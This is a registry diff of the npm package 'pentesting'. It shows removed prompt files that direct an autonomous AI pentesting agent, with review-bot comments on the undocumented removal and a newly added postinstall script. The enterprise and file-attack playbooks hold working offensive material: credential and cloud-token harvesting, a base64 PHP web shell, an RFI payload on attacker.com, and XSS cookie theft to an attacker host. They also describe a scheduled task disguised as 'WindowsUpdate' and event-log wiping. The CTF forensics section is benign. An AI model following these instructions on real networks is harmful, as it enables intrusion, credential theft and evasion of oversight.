pentesting 0.73.13 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -44
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-KHXXTHGS.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4UNNRHYY.js +0 -5797
- package/dist/chunk-GILD75OT.js +0 -11407
- package/dist/chunk-S5ZMXFHR.js +0 -1162
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9777
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-U2N3KWFH.js +0 -13
- package/dist/process-registry-4Y3HB4YQ.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,175 +0,0 @@
|
|
|
1
|
-
# Enterprise Pentest — Internal Network Autonomous Assessment
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This is a **Bootstrap Reference**, not a prescribed order.
|
|
4
|
-
> Adapt based on `get_state`, attack graph observations, and live target behavior.
|
|
5
|
-
> **Cross-ref**: ad-attack.md (AD attacks), pivoting.md (lateral movement), zero-day.md (C4)
|
|
6
|
-
|
|
7
|
-
---
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
Enterprise environments = layered defense + network segmentation + centralized AD + cloud integration
|
|
13
|
-
|
|
14
|
-
Priority:
|
|
15
|
-
1. Map internal network first → identify segments, DCs, critical services
|
|
16
|
-
2. Maximize lateral movement with captured credentials
|
|
17
|
-
3. AD domain → Forest compromise for full privilege escalation
|
|
18
|
-
4. Cloud (AWS/Azure/GCP) pivoting to complete hybrid environment takeover
|
|
19
|
-
```
|
|
20
|
-
|
|
21
|
-
---
|
|
22
|
-
|
|
23
|
-
## Phase 1: Internal Network Enumeration (Immediately after foothold)
|
|
24
|
-
|
|
25
|
-
```
|
|
26
|
-
SEGMENT DISCOVERY (run immediately after first shell):
|
|
27
|
-
├── ip a / ifconfig → network interfaces + IP ranges
|
|
28
|
-
├── ip route / netstat -rn → routing table → internal subnet list
|
|
29
|
-
├── arp -a → directly connected hosts
|
|
30
|
-
├── cat /etc/hosts → internal hostname mappings
|
|
31
|
-
└── cat /etc/resolv.conf → internal DNS server → domain enumeration base
|
|
32
|
-
|
|
33
|
-
ADJACENT SUBNET SCAN:
|
|
34
|
-
nmap -sn 10.x.x.0/24
|
|
35
|
-
for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done
|
|
36
|
-
|
|
37
|
-
DNS ENUMERATION:
|
|
38
|
-
dig axfr @internal_dns domain.corp
|
|
39
|
-
dnsrecon -d corp.local -t axfr
|
|
40
|
-
for i in $(seq 1 254); do host 10.x.x.$i; done | grep "domain name pointer"
|
|
41
|
-
```
|
|
42
|
-
|
|
43
|
-
---
|
|
44
|
-
|
|
45
|
-
## Phase 2: Critical Internal Service Discovery
|
|
46
|
-
|
|
47
|
-
```
|
|
48
|
-
CRITICAL SERVICES TO FIND:
|
|
49
|
-
┌─────────────────────────────────────────────────────────────────────┐
|
|
50
|
-
│ Service Port Attack Vector │
|
|
51
|
-
├─────────────────────────────────────────────────────────────────────┤
|
|
52
|
-
│ Active Directory DC 88/389/636 Kerberos/LDAP/LDAPS │
|
|
53
|
-
│ SCCM/WSUS 8530/8531 Privilege escalation, malicious │
|
|
54
|
-
│ update delivery │
|
|
55
|
-
│ Exchange/Mail 25/443 Internal phishing, relay attacks │
|
|
56
|
-
│ Corporate CA (ADCS) 80/443 ESC1~13 ADCS vulnerabilities │
|
|
57
|
-
│ Jump Host/Bastion 22/3389 Lateral movement hub │
|
|
58
|
-
│ Database servers 1433/3306/5432 Credential reuse + data dump │
|
|
59
|
-
│ DevOps infra 8080/9000 Jenkins/SonarQube weak auth → │
|
|
60
|
-
│ code execution │
|
|
61
|
-
│ Cloud Metadata 169.254.169.254 IAM credential access │
|
|
62
|
-
└─────────────────────────────────────────────────────────────────────┘
|
|
63
|
-
|
|
64
|
-
SCCM ATTACKS (Enterprise-specific):
|
|
65
|
-
1. net group "SMS Admins" /domain → SCCM administrator list
|
|
66
|
-
2. Extract SCCM NAA (Network Access Account) credentials
|
|
67
|
-
3. Tools: SCCMHunter, SharpSCCM
|
|
68
|
-
web_search("SCCM attack lateral movement credential extraction {year}")
|
|
69
|
-
|
|
70
|
-
EXCHANGE ATTACKS:
|
|
71
|
-
1. ProxyShell/ProxyLogon: check CVE → run PoC
|
|
72
|
-
2. NTLM relay: responder + ntlmrelayx → capture Exchange auth
|
|
73
|
-
3. EWS (Exchange Web Services): ruler, EWSoauth
|
|
74
|
-
```
|
|
75
|
-
|
|
76
|
-
---
|
|
77
|
-
|
|
78
|
-
## Phase 3: AD Forest Attacks (after single domain compromise)
|
|
79
|
-
|
|
80
|
-
```
|
|
81
|
-
FOREST TRUST EXPLOITATION:
|
|
82
|
-
├── Discover trust relationships:
|
|
83
|
-
│ nltest /domain_trusts
|
|
84
|
-
│ PowerView: Get-DomainTrust
|
|
85
|
-
│
|
|
86
|
-
├── SID History attack (cross-forest movement):
|
|
87
|
-
│ - Current domain DA → target forest Enterprise Admin
|
|
88
|
-
│ - mimikatz lsadump::trust /patch → extract trust key
|
|
89
|
-
│ - kerberos::golden /user:Administrator /domain:corp.local
|
|
90
|
-
│ /sid:S-1-5-21-... /sids:S-1-5-21-TARGET-519 /rc4:TRUSTKEY
|
|
91
|
-
│
|
|
92
|
-
├── External Trust → Kerberoast across trust:
|
|
93
|
-
│ Get-DomainUser -Domain external.corp -SPN
|
|
94
|
-
│ Invoke-Kerberoast -Domain external.corp | Export-CSV
|
|
95
|
-
│
|
|
96
|
-
└── SID Filtering bypass:
|
|
97
|
-
web_search("SID filtering bypass forest trust attack {year}")
|
|
98
|
-
|
|
99
|
-
ENTERPRISE ADMIN PATHS:
|
|
100
|
-
1. Achieve DA in all domains → target Enterprise Admin directly
|
|
101
|
-
2. Schema Admin path → AD schema modification
|
|
102
|
-
3. Corp CA (ADCS) ESC6/ESC8 → Enterprise Admin certificate
|
|
103
|
-
```
|
|
104
|
-
|
|
105
|
-
---
|
|
106
|
-
|
|
107
|
-
## Phase 4: Cloud Pivoting (Hybrid environments)
|
|
108
|
-
|
|
109
|
-
```
|
|
110
|
-
ON-PREM → CLOUD PIVOT:
|
|
111
|
-
|
|
112
|
-
Credential sources:
|
|
113
|
-
env | grep -iE "aws|azure|gcp|secret|key|token"
|
|
114
|
-
find / -name "*.env" -o -name "credentials" -o -name "*.pem" -o -name "*.json" 2>/dev/null
|
|
115
|
-
cat ~/.aws/credentials ~/.azure/credentials ~/.config/gcloud/credentials.db
|
|
116
|
-
|
|
117
|
-
AWS ESCALATION:
|
|
118
|
-
aws sts get-caller-identity → current identity
|
|
119
|
-
aws iam list-attached-user-policies → current permissions
|
|
120
|
-
aws iam list-roles → assumable roles
|
|
121
|
-
aws sts assume-role --role-arn arn:... → privilege escalation
|
|
122
|
-
→ Goal: AdministratorAccess policy acquisition
|
|
123
|
-
web_search("AWS privilege escalation IAM misconfiguration {year}")
|
|
124
|
-
|
|
125
|
-
AZURE ESCALATION:
|
|
126
|
-
az login --use-device-code (or use stolen token)
|
|
127
|
-
az account list → accessible subscriptions
|
|
128
|
-
az vm list → VM inventory
|
|
129
|
-
az keyvault secret list --vault-name ... → dump secrets
|
|
130
|
-
Managed Identity → az role assignment list → check permissions
|
|
131
|
-
web_search("Azure privilege escalation managed identity {year}")
|
|
132
|
-
|
|
133
|
-
GCP ESCALATION:
|
|
134
|
-
gcloud auth list → authenticated accounts
|
|
135
|
-
gcloud projects list → accessible projects
|
|
136
|
-
gcloud iam service-accounts list → service account list
|
|
137
|
-
gcloud compute instances list → VM inventory
|
|
138
|
-
web_search("GCP privilege escalation service account {year}")
|
|
139
|
-
|
|
140
|
-
IMDS (Instance Metadata Service) attack:
|
|
141
|
-
AWS: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
142
|
-
Azure: curl -H "Metadata:true" http://169.254.169.254/metadata/identity/oauth2/token
|
|
143
|
-
GCP: curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
|
|
144
|
-
-H "Metadata-Flavor:Google"
|
|
145
|
-
```
|
|
146
|
-
|
|
147
|
-
---
|
|
148
|
-
|
|
149
|
-
## Phase 5: Long-term Persistence
|
|
150
|
-
|
|
151
|
-
```
|
|
152
|
-
ENTERPRISE PERSISTENCE (minimize detection risk):
|
|
153
|
-
├── Domain level: Golden Ticket (10-year validity) → exfiltrate krbtgt hash offline
|
|
154
|
-
├── Silver Ticket: service-specific TGS → permanent access to specific service
|
|
155
|
-
├── Scheduled task: schtasks /create /tn "WindowsUpdate" /tr ... /sc daily (disguised)
|
|
156
|
-
├── WMI persistence: wmic /namespace:\\root\subscription event handler
|
|
157
|
-
└── Cloud: backdoor IAM user / Lambda trigger / Lambda persistence
|
|
158
|
-
|
|
159
|
-
EVIDENCE CLEANUP (post-detection):
|
|
160
|
-
Windows: wevtutil cl System; wevtutil cl Security; wevtutil cl Application
|
|
161
|
-
Linux: echo -n > /var/log/auth.log; history -c; unset HISTFILE
|
|
162
|
-
Note: Log deletion itself is an IOC — minimal footprint is the guiding principle
|
|
163
|
-
```
|
|
164
|
-
|
|
165
|
-
---
|
|
166
|
-
|
|
167
|
-
## Search Patterns
|
|
168
|
-
|
|
169
|
-
```
|
|
170
|
-
web_search("enterprise pentest internal network lateral movement {year}")
|
|
171
|
-
web_search("SCCM attack chain privilege escalation credential extraction {year}")
|
|
172
|
-
web_search("AD forest trust attack SID filtering bypass Enterprise Admin {year}")
|
|
173
|
-
web_search("cloud AWS Azure GCP privilege escalation IAM misconfiguration {year}")
|
|
174
|
-
web_search("Exchange server ProxyShell ProxyLogon {version} exploit")
|
|
175
|
-
```
|
|
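Review bot: this hunk removes the whole enterprise-pentest.md prompt from the published tarball, but nothing in the diff records where that text now lives; the file summary shows every package/dist/ file deleted while package/lib/runtime.mjs (+419) and package/scripts/postinstall.mjs (+30) are new, and the README and package.json hunks are not in view. The release notes for 0.90.1 should state whether these prompts are now fetched at install time or at run time, because anyone auditing the package can no longer read what the agent is instructed to do, and this file contains an `EVIDENCE CLEANUP` block (`wevtutil cl Security`, `echo -n > /var/log/auth.log`) and a scheduled task disguised as `"WindowsUpdate"` that an engagement scope would normally have to approve explicitly. If the text is being relocated rather than retired, also fix the `ADJACENT SUBNET SCAN` loop: `for sub in $(seq 1 20); do nmap -sn 10.$sub.0.0/24; done` only pings the first /24 of each 10.N.0.0/16, so it does not cover the adjacent subnets the heading claims.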
@@ -1,144 +0,0 @@
|
|
|
1
|
-
# File-Based Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: injection.md (for injection via files), shells.md (web shells), evasion.md (filter bypass)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
Files are one of the most powerful attack vectors. There are dozens of file-based
|
|
7
|
-
attack techniques, each with hundreds of bypass variants. Search and adapt.
|
|
8
|
-
|
|
9
|
-
## File Attack Type Map
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
FILE-BASED ATTACK CATEGORIES:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Local File Inclusion (LFI)
|
|
15
|
-
│ ├── Basic: ../../etc/passwd, ....//....//etc/passwd
|
|
16
|
-
│ ├── Null byte: ../../etc/passwd%00 (PHP < 5.3.4)
|
|
17
|
-
│ ├── Double encoding: %252e%252e%252f
|
|
18
|
-
│ ├── UTF-8 overlong: %c0%ae%c0%ae/
|
|
19
|
-
│ ├── Wrappers (PHP): php://filter, php://input, data://, expect://, zip://, phar://
|
|
20
|
-
│ │ ├── Read source: php://filter/read=convert.base64-encode/resource=config.php
|
|
21
|
-
│ │ ├── RCE: php://input + POST body with PHP code
|
|
22
|
-
│ │ ├── RCE: data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+
|
|
23
|
-
│ │ ├── RCE: expect://id (if expect wrapper enabled)
|
|
24
|
-
│ │ └── RCE: phar://malicious.phar (deserialization via phar metadata)
|
|
25
|
-
│ ├── Windows: ..\..\windows\system32\drivers\etc\hosts
|
|
26
|
-
│ ├── Interesting files to read:
|
|
27
|
-
│ │ ├── Linux: /etc/passwd, /etc/shadow, /proc/self/environ, /proc/self/cmdline
|
|
28
|
-
│ │ ├── Web: /var/www/html/.env, wp-config.php, config.php, database.yml
|
|
29
|
-
│ │ ├── SSH: /home/*/.ssh/id_rsa, /root/.ssh/id_rsa
|
|
30
|
-
│ │ ├── Logs: /var/log/apache2/access.log (for log poisoning → RCE)
|
|
31
|
-
│ │ ├── Proc: /proc/self/fd/N (leaked file descriptors)
|
|
32
|
-
│ │ └── Windows: C:\Windows\win.ini, C:\boot.ini, web.config
|
|
33
|
-
│ └── LFI → RCE CHAINS:
|
|
34
|
-
│ ├── Log poisoning: inject PHP via User-Agent → include apache/nginx log
|
|
35
|
-
│ ├── /proc/self/environ: inject PHP via User-Agent/Referer header
|
|
36
|
-
│ ├── PHP session files: inject into session → include /tmp/sess_SESSIONID
|
|
37
|
-
│ ├── Temp files: race condition upload → include before cleanup
|
|
38
|
-
│ ├── Mail log: send email with PHP code → include /var/mail/www-data
|
|
39
|
-
│ └── web_search("LFI to RCE techniques {year}")
|
|
40
|
-
│
|
|
41
|
-
├── 2. Remote File Inclusion (RFI)
|
|
42
|
-
│ ├── Basic: ?page=http://attacker.com/shell.txt
|
|
43
|
-
│ ├── Requires: allow_url_include=On (PHP)
|
|
44
|
-
│ ├── Protocol: http://, https://, ftp://
|
|
45
|
-
│ ├── Null byte bypass: ?page=http://attacker.com/shell.txt%00
|
|
46
|
-
│ └── Often disabled — check and try, but LFI is more common
|
|
47
|
-
│
|
|
48
|
-
├── 3. Path Traversal (Directory Traversal)
|
|
49
|
-
│ ├── Basic: ../../../etc/passwd
|
|
50
|
-
│ ├── Encoded: %2e%2e%2f, %2e%2e/, ..%2f
|
|
51
|
-
│ ├── Double encoded: %252e%252e%252f
|
|
52
|
-
│ ├── Unicode: ..%c0%af, ..%ef%bc%8f
|
|
53
|
-
│ ├── Oversized: ....//, ....\/
|
|
54
|
-
│ ├── Absolute path: /etc/passwd (if app blindly prepends dir)
|
|
55
|
-
│ ├── Null byte: ../etc/passwd%00.png (bypass extension checks)
|
|
56
|
-
│ ├── In API parameters, cookies, headers, file names, ZIP entries
|
|
57
|
-
│ └── Use payload_mutate with context="path" for systematic variants
|
|
58
|
-
│
|
|
59
|
-
├── 4. File Upload Attacks
|
|
60
|
-
│ ├── BYPASS CATEGORIES (try ALL when blocked):
|
|
61
|
-
│ │ ├── Extension bypass:
|
|
62
|
-
│ │ │ ├── Double extension: shell.php.jpg, shell.jpg.php
|
|
63
|
-
│ │ │ ├── Alternative extensions: .php3, .php4, .php5, .phtml, .phar, .phps
|
|
64
|
-
│ │ │ ├── Case: .PHP, .Php, .pHp
|
|
65
|
-
│ │ │ ├── Special chars: shell.php%00.jpg, shell.php\x00.jpg, shell.php;.jpg
|
|
66
|
-
│ │ │ ├── Dot trailing: shell.php., shell.php..
|
|
67
|
-
│ │ │ ├── Space: shell.php (with trailing space)
|
|
68
|
-
│ │ │ └── web_search("file upload extension bypass {language}")
|
|
69
|
-
│ │ │
|
|
70
|
-
│ │ ├── Content-Type bypass:
|
|
71
|
-
│ │ │ ├── Change Content-Type to image/jpeg, image/png, image/gif
|
|
72
|
-
│ │ │ └── Keep malicious content, fake the content-type header
|
|
73
|
-
│ │ │
|
|
74
|
-
│ │ ├── Magic bytes bypass:
|
|
75
|
-
│ │ │ ├── GIF89a<?php system($_GET['cmd']); ?> (GIF header)
|
|
76
|
-
│ │ │ ├── \xFF\xD8\xFF\xE0 + PHP code (JPEG header)
|
|
77
|
-
│ │ │ ├── \x89PNG\r\n\x1a\n + PHP code (PNG header)
|
|
78
|
-
│ │ │ └── Prepend legitimate file header to malicious code
|
|
79
|
-
│ │ │
|
|
80
|
-
│ │ ├── Server processing bypass:
|
|
81
|
-
│ │ │ ├── .htaccess upload: AddType application/x-httpd-php .jpg
|
|
82
|
-
│ │ │ ├── web.config upload (IIS): handlers → execute aspx
|
|
83
|
-
│ │ │ ├── Polyglot files: valid image AND valid PHP/JSP/ASP
|
|
84
|
-
│ │ │ └── Filename manipulation: shell.php%20, shell.php::$DATA (Windows ADS)
|
|
85
|
-
│ │ │
|
|
86
|
-
│ │ └── Race condition:
|
|
87
|
-
│ │ ├── Upload → access before validation/deletion
|
|
88
|
-
│ │ ├── Write script for concurrent upload + access
|
|
89
|
-
│ │ └── web_search("file upload race condition exploit")
|
|
90
|
-
│ │
|
|
91
|
-
│ ├── POST-UPLOAD EXPLOITATION:
|
|
92
|
-
│ │ ├── Access uploaded shell: try common upload dirs
|
|
93
|
-
│ │ │ /uploads/, /images/, /media/, /files/, /tmp/, /static/
|
|
94
|
-
│ │ ├── If path unknown: LFI to find path, or fuzz the upload directory
|
|
95
|
-
│ │ └── Upgrade web shell to reverse shell (see shells.md)
|
|
96
|
-
│ │
|
|
97
|
-
│ └── SEARCH PATTERN:
|
|
98
|
-
│ web_search("file upload bypass techniques {year}")
|
|
99
|
-
│ web_search("{framework} file upload vulnerability")
|
|
100
|
-
│ web_search("file upload {defense} bypass")
|
|
101
|
-
│
|
|
102
|
-
├── 5. ZIP/Archive Attacks
|
|
103
|
-
│ ├── Zip Slip: path traversal in archive (../../../etc/cron.d/evil)
|
|
104
|
-
│ ├── ZIP symlink: include symlink to /etc/passwd → extracted by server
|
|
105
|
-
│ ├── ZIP bomb: denial of service (if relevant)
|
|
106
|
-
│ ├── Polyglot ZIP: valid ZIP + valid PHP
|
|
107
|
-
│ └── web_search("zip slip vulnerability exploitation")
|
|
108
|
-
│
|
|
109
|
-
├── 6. Symlink Attacks
|
|
110
|
-
│ ├── Create symlink to sensitive file → access through web
|
|
111
|
-
│ ├── Race condition: symlink swap between check and use (TOCTOU)
|
|
112
|
-
│ ├── Git symlink: include symlink in git repo → checkout reads target file
|
|
113
|
-
│ └── Relevant in: file upload, archive extraction, temp file operations
|
|
114
|
-
│
|
|
115
|
-
├── 7. Server-Side Processing Attacks
|
|
116
|
-
│ ├── ImageMagick (ImageTragick): web_search("imagemagick exploit CVE-2016-3714")
|
|
117
|
-
│ │ ├── SVG with embedded commands
|
|
118
|
-
│ │ ├── MVG file format exploitation
|
|
119
|
-
│ │ └── Ghostscript exploitation
|
|
120
|
-
│ ├── FFmpeg: SSRF via HLS playlist, local file read
|
|
121
|
-
│ ├── LibreOffice: macro execution, SSRF via document links
|
|
122
|
-
│ ├── PDF generators (wkhtmltopdf, dompdf): SSRF, XSS, local file read
|
|
123
|
-
│ │ ├── <iframe src="file:///etc/passwd">
|
|
124
|
-
│ │ ├── <script>document.location="http://attacker/?"+document.cookie</script>
|
|
125
|
-
│ │ └── web_search("{pdf_generator} SSRF local file read")
|
|
126
|
-
│ └── Document parsers: DOCX/XLSX (XXE via embedded XML), CSV injection
|
|
127
|
-
│
|
|
128
|
-
└── 8. SSRF via File Operations
|
|
129
|
-
├── URL parameter → file:///etc/passwd, gopher://, dict://
|
|
130
|
-
├── Cloud metadata: http://169.254.169.254/latest/meta-data/
|
|
131
|
-
├── Internal services: http://localhost:6379/ (Redis), http://localhost:9200/ (Elastic)
|
|
132
|
-
└── See web.md SSRF section for comprehensive SSRF methodology
|
|
133
|
-
```
|
|
134
|
-
|
|
135
|
-
## 🧠 File Attack Search Patterns
|
|
136
|
-
```
|
|
137
|
-
web_search("LFI to RCE {language} {framework} techniques")
|
|
138
|
-
web_search("file upload bypass {defense} {year}")
|
|
139
|
-
web_search("path traversal {application} CVE")
|
|
140
|
-
web_search("{file_type} polyglot {language}")
|
|
141
|
-
web_search("file inclusion wrapper {language}")
|
|
142
|
-
web_search("PayloadsAllTheThings file inclusion")
|
|
143
|
-
web_search("PayloadsAllTheThings upload")
|
|
144
|
-
```
|
|
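Review bot: the removed file-attacks.md prompt calls agent tool functions by name (`payload_mutate with context="path"` under category 3 and `web_search(...)` throughout), so if these prompts are now loaded by the new package/lib/runtime.mjs instead of shipping in dist/, that runtime must keep exposing tools under exactly those names or the instructions will reference tools that do not exist; the hunk gives no sign either way, and the deletion is otherwise undocumented in the visible diff. One content point to carry forward if the text is relocated: the null-byte truncation items are correctly qualified with `(PHP < 5.3.4)` in the LFI list, but the same caveat is missing from `?page=http://attacker.com/shell.txt%00` under RFI and from `../etc/passwd%00.png` under path traversal, so those entries read as if the trick worked on current PHP.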
@@ -1,313 +0,0 @@
|
|
|
1
|
-
# Forensics & Steganography — Comprehensive CTF Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: file-attacks.md (file operations), pwn.md (binary analysis)
|
|
4
|
-
|
|
5
|
-
## Phase 0: File Analysis — Universal First Steps
|
|
6
|
-
|
|
7
|
-
```
|
|
8
|
-
With ANY unknown file:
|
|
9
|
-
├── file <file> → identify type (NEVER trust extension alone!)
|
|
10
|
-
├── strings <file> → extract readable strings
|
|
11
|
-
├── strings -el <file> → UTF-16 strings (Windows executables)
|
|
12
|
-
├── xxd <file> | head → hex dump first bytes (check magic bytes)
|
|
13
|
-
├── exiftool <file> → metadata (GPS, creator, timestamps, hidden fields)
|
|
14
|
-
├── binwalk <file> → embedded files/filesystems
|
|
15
|
-
│ └── binwalk -e <file> → extract embedded files
|
|
16
|
-
├── foremost <file> → file carving (alternative to binwalk)
|
|
17
|
-
└── entropy analysis:
|
|
18
|
-
binwalk -E <file> → high entropy = encrypted/compressed
|
|
19
|
-
|
|
20
|
-
Magic bytes quick reference:
|
|
21
|
-
├── 89 50 4E 47 → PNG
|
|
22
|
-
├── FF D8 FF → JPEG
|
|
23
|
-
├── 47 49 46 38 → GIF
|
|
24
|
-
├── 50 4B 03 04 → ZIP (also DOCX, XLSX, APK, JAR)
|
|
25
|
-
├── 1F 8B → GZIP
|
|
26
|
-
├── 42 5A 68 → BZIP2
|
|
27
|
-
├── 7F 45 4C 46 → ELF (Linux binary)
|
|
28
|
-
├── 4D 5A → PE (Windows executable)
|
|
29
|
-
├── 25 50 44 46 → PDF
|
|
30
|
-
├── D0 CF 11 E0 → MS Office (OLE2) — DOC, XLS, PPT
|
|
31
|
-
├── 52 49 46 46 → RIFF (WAV, AVI, WebP)
|
|
32
|
-
└── 00 00 00 18/20 → MP4 (ftyp)
|
|
33
|
-
|
|
34
|
-
File repair:
|
|
35
|
-
├── Corrupted header? → fix magic bytes manually with hex editor
|
|
36
|
-
├── PNG: pngcheck -v <file> → diagnose chunk errors
|
|
37
|
-
│ Fix CRC: python3 script to recalculate chunk CRC
|
|
38
|
-
│ Fix IHDR: width/height may be wrong → brute-force dimensions
|
|
39
|
-
├── ZIP: zip -FF corrupt.zip --out fixed.zip → repair archive
|
|
40
|
-
└── JPEG: truncated? → might still have flag in extractable data
|
|
41
|
-
```
|
|
42
|
-
|
|
43
|
-
## Steganography
|
|
44
|
-
|
|
45
|
-
```
|
|
46
|
-
═══════════════════════════════════════
|
|
47
|
-
Image Steganography:
|
|
48
|
-
═══════════════════════════════════════
|
|
49
|
-
|
|
50
|
-
JPEG:
|
|
51
|
-
├── steghide extract -sf <image.jpg> -p "" → try empty password first
|
|
52
|
-
├── steghide extract -sf <image.jpg> -p <pw> → with password
|
|
53
|
-
├── stegseek <image.jpg> rockyou.txt → brute force steghide password
|
|
54
|
-
├── stegcracker <image.jpg> rockyou.txt → alternative brute force
|
|
55
|
-
├── jsteg reveal <image.jpg> → jsteg extraction
|
|
56
|
-
└── outguess -r <image.jpg> output.txt → outguess extraction
|
|
57
|
-
|
|
58
|
-
PNG / BMP:
|
|
59
|
-
├── zsteg <image.png> → LSB analysis (multiple channels, orders)
|
|
60
|
-
├── zsteg -a <image.png> → try ALL extraction methods
|
|
61
|
-
├── pngcheck -v <image.png> → PNG structure validation
|
|
62
|
-
├── IDAT chunks: hidden data after IEND marker
|
|
63
|
-
│ python3 -c "data=open('img.png','rb').read(); print(data[data.index(b'IEND')+8:])"
|
|
64
|
-
├── LSB manual extraction:
|
|
65
|
-
│ from PIL import Image
|
|
66
|
-
│ img = Image.open('img.png')
|
|
67
|
-
│ bits = ''.join(str(px & 1) for px in img.getdata() for _ in [px] if isinstance(px, int))
|
|
68
|
-
│ # or for RGB: iterate R,G,B channels separately
|
|
69
|
-
└── Compare two similar images:
|
|
70
|
-
compare <img1> <img2> diff.png (ImageMagick)
|
|
71
|
-
→ pixel differences often reveal hidden data
|
|
72
|
-
|
|
73
|
-
GIF:
|
|
74
|
-
├── Multiple frames may hide data across frames
|
|
75
|
-
├── identify -verbose <file.gif> → frame count
|
|
76
|
-
├── convert <file.gif> frame_%d.png → extract all frames
|
|
77
|
-
└── Hidden frame with very short display time
|
|
78
|
-
|
|
79
|
-
General image:
|
|
80
|
-
├── StegSolve.jar → visual analysis (bit plane viewer, color channels)
|
|
81
|
-
├── CyberChef: Extract LSB
|
|
82
|
-
├── Compare file size to expected → hidden data appended
|
|
83
|
-
└── Check alpha channel (transparency) for hidden data
|
|
84
|
-
from PIL import Image
|
|
85
|
-
img = Image.open('img.png').split()[-1] # alpha channel
|
|
86
|
-
|
|
87
|
-
═══════════════════════════════════════
|
|
88
|
-
Audio Steganography:
|
|
89
|
-
═══════════════════════════════════════
|
|
90
|
-
├── Audacity → spectrogram view (Analyze → Plot Spectrum or View → Spectrogram)
|
|
91
|
-
│ Hidden images/text visible in frequency domain
|
|
92
|
-
├── sonic-visualiser → detailed spectrogram layers
|
|
93
|
-
├── DTMF decoder → phone dial tones (multimon-ng)
|
|
94
|
-
├── morse-decoder → morse code in audio
|
|
95
|
-
├── wav hidden data:
|
|
96
|
-
│ python3 → read raw samples → LSB extraction
|
|
97
|
-
│ stegolsb wavsteg -r -i audio.wav -o output.txt
|
|
98
|
-
├── SSTV (Slow-Scan Television):
|
|
99
|
-
│ qsstv or RX-SSTV → decode image from audio signal
|
|
100
|
-
│ Common in space/radio-themed CTFs
|
|
101
|
-
└── mp3stego → MP3-specific steganography
|
|
102
|
-
|
|
103
|
-
═══════════════════════════════════════
|
|
104
|
-
Text / Document Steganography:
|
|
105
|
-
═══════════════════════════════════════
|
|
106
|
-
├── Whitespace stego: stegsnow -C <file>
|
|
107
|
-
│ Tabs and spaces encode binary data at end of lines
|
|
108
|
-
├── Zero-width characters: Unicode U+200B, U+200C, U+200D, U+FEFF
|
|
109
|
-
│ cat -v <file> | grep -o '\xE2\x80[\x8B-\x8F]' → detect
|
|
110
|
-
├── Homoglyph attacks: visually identical but different Unicode chars
|
|
111
|
-
│ 'а' (Cyrillic) vs 'a' (Latin) → different bytes
|
|
112
|
-
├── Line-ending manipulation: CRLF vs LF patterns encode bits
|
|
113
|
-
├── PDF steganography:
|
|
114
|
-
│ ├── pdf-parser.py <file.pdf> → analyze objects
|
|
115
|
-
│ ├── Hidden JavaScript: /JavaScript, /JS keys
|
|
116
|
-
│ ├── Embedded files in PDF streams
|
|
117
|
-
│ ├── Invisible text (white on white)
|
|
118
|
-
